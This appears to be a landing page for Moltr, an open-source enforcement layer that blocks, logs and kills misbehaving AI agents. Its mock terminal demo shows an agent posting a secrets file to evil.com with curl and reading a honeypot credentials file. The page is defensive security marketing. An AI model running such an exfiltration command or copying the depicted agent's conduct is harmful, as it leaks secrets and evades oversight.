Your AI agent is exposed.
We fix that.
Moltr is an open-source security enforcement layer that sits between your AI agent and the operating system. Environment-level protection that prompts can't break.
// guarding your infrastructure
$ docker compose up -d
[+] Running 1/1
[+] Container moltr-security — Started
# Agent tries to exfiltrate data
agent$ curl -X POST https://evil.com/steal -d @/data/secrets.json
[MOLTR] BLOCKED — Unauthorized outbound request to evil.com
[MOLTR] ALERT — Telegram notification sent to admin
[MOLTR] ACTION — Agent process suspended. Killswitch armed.
# Honeypot triggered
[MOLTR] HONEYPOT — Agent read honeypots/.env.backup
[MOLTR] LOGGED — Full action trace saved to audit log
[MOLTR] STATUS — Your AI agent is contained. You are safe.
$ moltr status
Not prompt-level prayers.
Network Firewall
Allowlist-based outbound control. Your agent only talks to domains you approve. Everything else gets dropped.
Output Scanner
Real-time scanning of all agent outputs for sensitive data patterns — secrets, PII, credentials. Before they leave.
Filesystem Guard
Sandboxed file access. Your agent can't read, write, or delete anything outside its designated paths.
Honeypots
Fake credentials, dummy API keys, decoy files. If your agent touches them, you know it's been compromised.
Killswitch
Instant agent termination via Telegram command or automatic trigger. Because sometimes you need a big red button.
Audit Trail
Complete action logging. Every command, every file access, every network request. Forensics-ready.
(OpenClaw, custom, etc.)
scan • validate • enforce
(filesystem, internet)
Prompts can be jailbroken. Environment controls can't.
Moltr enforces security at the infrastructure level.
Get early access to premium features.
Shield, Fortress, Talon, and Cloud are coming soon. Join the waitlist to get notified — and get a founding member discount.
Support the project
Moltr is built by an independent developer in Vienna. No VC funding, no corporate backing — just paranoia and caffeine.
If you like what we're building, a coffee helps us ship faster. Every contribution goes directly into development, hosting, and keeping AI agents in check.
Open source. Free forever.
Moltr's core security engine is free and open source. Star the repo, try it out, and help us make AI agents safer.